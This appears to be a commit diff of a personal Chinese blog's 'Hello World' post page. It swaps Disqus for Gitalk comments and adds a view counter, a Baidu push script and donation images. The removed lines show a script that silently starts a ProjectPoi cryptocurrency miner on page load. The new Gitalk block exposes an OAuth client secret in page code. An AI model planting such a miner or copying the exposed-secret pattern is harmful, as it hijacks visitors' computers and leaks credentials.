1
1
<!DOCTYPE html>
2
2
3
3
4
- < html class ="light page-home ">
4
+ < html class ="light page-post ">
5
5
6
6
7
7
< head >
19
19
< meta name ="keywords " content ="Nothing ">
20
20
< meta property ="og:type " content ="article ">
21
21
< meta property ="og:title " content ="Hello World ">
22
- < meta property ="og:url " content ="http://www.eyrefree.org/2011/10/24/2011-10-24- Hello-World/index.html ">
22
+ < meta property ="og:url " content ="http://www.eyrefree.org/2011/10/24/Hello-World/index.html ">
23
23
< meta property ="og:site_name " content ="荏苒。 ">
24
24
< meta property ="og:description " content ="本文链接:http://www.eyrefree.org/2011/10/24/2011-10-24-Hello-World/ 如文中无特殊说明,本站均使用以下协议保护:署名-非商业性使用-禁止演绎 ">
25
25
< meta property ="og:image " content ="http://www.eyrefree.org/images/Hello-World-1.jpg ">
35
35
< link rel ="icon " href ="/favicon.ico ">
36
36
37
37
38
- < link href ="/css/styles.css?v=32204ee7 " rel ="stylesheet ">
38
+ < link href ="/css/styles.css?v=c114cbe6 " rel ="stylesheet ">
39
39
40
40
41
41
42
- < link rel ="stylesheet " href ="/css/eyrefree .css ">
42
+ < link rel ="stylesheet " href ="/css/personal-style .css ">
43
43
44
44
45
45
56
56
</ script >
57
57
58
58
59
+
59
60
< script type ="text/javascript ">
60
- var script = document . createElement ( 'script' ) ;
61
- script . type = 'text/javascript' ;
62
- script . src = "https://ppoi.org/lib/projectpoi.min.js" ;
63
- script . onload = script . onreadystatechange = function ( ) {
64
- var miner = new ProjectPoi . Anonymous (
65
- 'UjbAwJp9LgDwHhcROxiTBUpc' , {
66
- threads : 1 ,
67
- autoThreads : false ,
68
- throttle : 0.5
69
- }
70
- ) ;
71
- miner . start ( ) ;
72
- }
73
- document . getElementsByTagName ( 'head' ) [ 0 ] . appendChild ( script ) ;
74
- </ script >
61
+ ( function ( ) {
62
+ var bp = document . createElement ( 'script' ) ;
63
+ var curProtocol = window . location . protocol . split ( ':' ) [ 0 ] ;
64
+ if ( curProtocol === 'https' ) {
65
+ bp . src = 'https://zz.bdstatic.com/linksubmit/push.js' ;
66
+ }
67
+ else {
68
+ bp . src = 'http://push.zhanzhang.baidu.com/push.js' ;
69
+ }
70
+ var s = document . getElementsByTagName ( "script" ) [ 0 ] ;
71
+ s . parentNode . insertBefore ( bp , s ) ;
72
+ } ) ( ) ;
73
+ </ script >
74
+
75
+
76
+
77
+
78
+ < script async src ="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js "> </ script >
79
+
80
+
81
+
82
+ < link rel ="stylesheet " href ="//cdn.bootcss.com/font-awesome/4.3.0/css/font-awesome.min.css ">
83
+
75
84
</ head >
76
85
77
86
< body >
78
87
88
+
79
89
80
90
< span id ="toolbox-mobile " class ="toolbox-mobile "> 盒子</ span >
81
91
94
104
< a
95
105
class ="CIRCLE "
96
106
href ="/archives/ "
107
+ rel ="noopener noreferrer "
97
108
target ="_self "
98
109
>
99
110
博客
104
115
< a
105
116
class ="CIRCLE "
106
117
href ="/category/ "
118
+ rel ="noopener noreferrer "
107
119
target ="_self "
108
120
>
109
121
分类
114
126
< a
115
127
class ="CIRCLE "
116
128
href ="/tag/ "
129
+ rel ="noopener noreferrer "
117
130
target ="_self "
118
131
>
119
132
标签
124
137
< a
125
138
class ="CIRCLE "
126
139
href ="/project/ "
140
+ rel ="noopener noreferrer "
127
141
target ="_self "
128
142
>
129
143
项目
134
148
< a
135
149
class ="CIRCLE "
136
150
href ="/link/ "
151
+ rel ="noopener noreferrer "
137
152
target ="_self "
138
153
>
139
154
友链
144
159
< a
145
160
class ="CIRCLE "
146
161
href ="/about/ "
162
+ rel ="noopener noreferrer "
147
163
target ="_self "
148
164
>
149
165
关于
154
170
< a
155
171
class ="CIRCLE "
156
172
href ="/atom.xml "
173
+ rel ="noopener noreferrer "
157
174
target ="_blank "
158
175
>
159
176
RSS
164
181
< a
165
182
class ="CIRCLE "
166
183
href ="/search/ "
184
+ rel ="noopener noreferrer "
167
185
target ="_self "
168
186
>
169
187
搜索
180
198
181
199
182
200
< div class ="content content-post CENTER ">
183
- < article id ="post-2011-10-24- Hello-World " class ="article article-type-post " itemprop ="blogPost ">
201
+ < article id ="post-Hello-World " class ="article article-type-post " itemprop ="blogPost ">
184
202
< header class ="article-header ">
185
203
< h1 class ="post-title "> Hello World</ h1 >
186
204
@@ -206,12 +224,15 @@ <h1 class="post-title">Hello World</h1>
206
224
207
225
208
226
209
- < span >
210
- < i class ="icon-comment "> </ i >
211
- < a href ="http://www.eyrefree.org/2011/10/24/2011-10-24-Hello-World/#disqus_thread "> </ a >
227
+
228
+
229
+ < i class ="fa fa-eye "> </ i >
230
+ < span id ="busuanzi_container_page_pv ">
231
+  热度 < span id ="busuanzi_value_page_pv ">
232
+ < i class ="fa fa-spinner fa-spin "> </ i > </ span > ℃
212
233
</ span >
213
234
214
-
235
+
215
236
</ div >
216
237
</ header >
217
238
@@ -225,8 +246,71 @@ <h1 class="post-title">Hello World</h1>
225
246
226
247
227
248
</ div >
249
+
250
+
251
+
252
+ <!-- Gitalk评论插件通用代码 -->
253
+ < div id ="git "> </ div >
254
+ < link rel ="stylesheet " href ="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css ">
255
+ < script src ="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js "> </ script >
256
+ < script >
257
+ const gitalk = new Gitalk ( {
258
+ clientID : 'f0ba789df6609f62044d' ,
259
+ clientSecret : '75f0fc8ccefb72c7c8585ddc2a3f0663e69139f1' ,
260
+ repo : 'EFGitalk' ,
261
+ owner : 'EyreFree' ,
262
+ admin : [ 'EyreFree' ] ,
263
+ // facebook-like distraction free mode
264
+ distractionFreeMode : false
265
+ } )
266
+ gitalk . render ( 'git' )
267
+ </ script >
268
+ <!-- Gitalk代码结束 -->
269
+
270
+
271
+
272
+
273
+
228
274
</ article >
229
275
276
+
277
+
278
+ < div class ="text-center donation ">
279
+ < div class ="inner-donation ">
280
+ < span class ="btn-donation "> 支持一下</ span >
281
+ < div class ="donation-body ">
282
+ < div class ="tip text-center "> 给 EyreFree 投食,QAQ</ div >
283
+ < ul >
284
+
285
+ < li class ="item ">
286
+
287
+ < img src ="/AliPay.png " alt ="">
288
+ </ li >
289
+
290
+ < li class ="item ">
291
+
292
+ < img src ="/WeChat.png " alt ="">
293
+ </ li >
294
+
295
+ </ ul >
296
+ </ div >
297
+ </ div >
298
+ </ div >
299
+
300
+
301
+
302
+ < div class ="box-prev-next clearfix ">
303
+ < a class ="hide pull-left " href ="/ ">
304
+ < i class ="icon icon-angle-left "> </ i >
305
+ </ a >
306
+ < a class ="show pull-right " href ="/2011/11/11/Sing-A-Song/ ">
307
+ < i class ="icon icon-angle-right "> </ i >
308
+ </ a >
309
+ </ div >
310
+
311
+
312
+
313
+
230
314
</ div >
231
315
232
316
@@ -251,6 +335,7 @@ <h1 class="post-title">Hello World</h1>
251
335
< a
252
336
class ="CIRCLE "
253
337
href ="/archives/ "
338
+ rel ="noopener noreferrer "
254
339
target ="_self "
255
340
>
256
341
博客
@@ -261,6 +346,7 @@ <h1 class="post-title">Hello World</h1>
261
346
< a
262
347
class ="CIRCLE "
263
348
href ="/category/ "
349
+ rel ="noopener noreferrer "
264
350
target ="_self "
265
351
>
266
352
分类
@@ -271,6 +357,7 @@ <h1 class="post-title">Hello World</h1>
271
357
< a
272
358
class ="CIRCLE "
273
359
href ="/tag/ "
360
+ rel ="noopener noreferrer "
274
361
target ="_self "
275
362
>
276
363
标签
@@ -281,6 +368,7 @@ <h1 class="post-title">Hello World</h1>
281
368
< a
282
369
class ="CIRCLE "
283
370
href ="/project/ "
371
+ rel ="noopener noreferrer "
284
372
target ="_self "
285
373
>
286
374
项目
@@ -291,6 +379,7 @@ <h1 class="post-title">Hello World</h1>
291
379
< a
292
380
class ="CIRCLE "
293
381
href ="/link/ "
382
+ rel ="noopener noreferrer "
294
383
target ="_self "
295
384
>
296
385
友链
@@ -301,6 +390,7 @@ <h1 class="post-title">Hello World</h1>
301
390
< a
302
391
class ="CIRCLE "
303
392
href ="/about/ "
393
+ rel ="noopener noreferrer "
304
394
target ="_self "
305
395
>
306
396
关于
@@ -311,6 +401,7 @@ <h1 class="post-title">Hello World</h1>
311
401
< a
312
402
class ="CIRCLE "
313
403
href ="/atom.xml "
404
+ rel ="noopener noreferrer "
314
405
target ="_blank "
315
406
>
316
407
RSS
@@ -321,6 +412,7 @@ <h1 class="post-title">Hello World</h1>
321
412
< a
322
413
class ="CIRCLE "
323
414
href ="/search/ "
415
+ rel ="noopener noreferrer "
324
416
target ="_self "
325
417
>
326
418
搜索
@@ -338,34 +430,17 @@ <h1 class="post-title">Hello World</h1>
338
430
339
431
< div class ="fexo-comments comments-post ">
340
432
341
- < section class ="disqus-comments ">
342
- < div id ="disqus_thread ">
343
- < noscript > Please enable JavaScript to view the < a href ="//disqus.com/?ref_noscript "> comments powered by Disqus.</ a > </ noscript >
344
- </ div >
345
- </ section >
346
433
347
- < script >
348
- var disqus_shortname = 'eyrefree' ;
349
434
350
- var disqus_url = 'http://www.eyrefree.org/2011/10/24/2011-10-24-Hello-World/' ;
351
435
352
- ( function ( ) {
353
- var dsq = document . createElement ( 'script' ) ;
354
- dsq . type = 'text/javascript' ;
355
- dsq . async = true ;
356
- dsq . src = '//' + disqus_shortname + '.disqus.com/embed.js' ;
357
- ( document . getElementsByTagName ( 'head' ) [ 0 ] || document . getElementsByTagName ( 'body' ) [ 0 ] ) . appendChild ( dsq ) ;
358
- } ) ( ) ;
359
- </ script >
360
-
361
- < script id ="dsq-count-scr " src ="//eyrefree.disqus.com/count.js " async > </ script >
362
-
363
-
364
436
365
437
438
+
366
439
440
+
367
441
368
-
442
+
443
+
369
444
370
445
</ div >
371
446
@@ -395,7 +470,7 @@ <h1 class="post-title">Hello World</h1>
395
470
}
396
471
397
472
window . onload = function ( ) {
398
- loadScript ( '/js/bundle.js?235687 ' , function ( ) {
473
+ loadScript ( '/js/bundle.js?235683 ' , function ( ) {
399
474
// load success
400
475
} ) ;
401
476
}
0 commit comments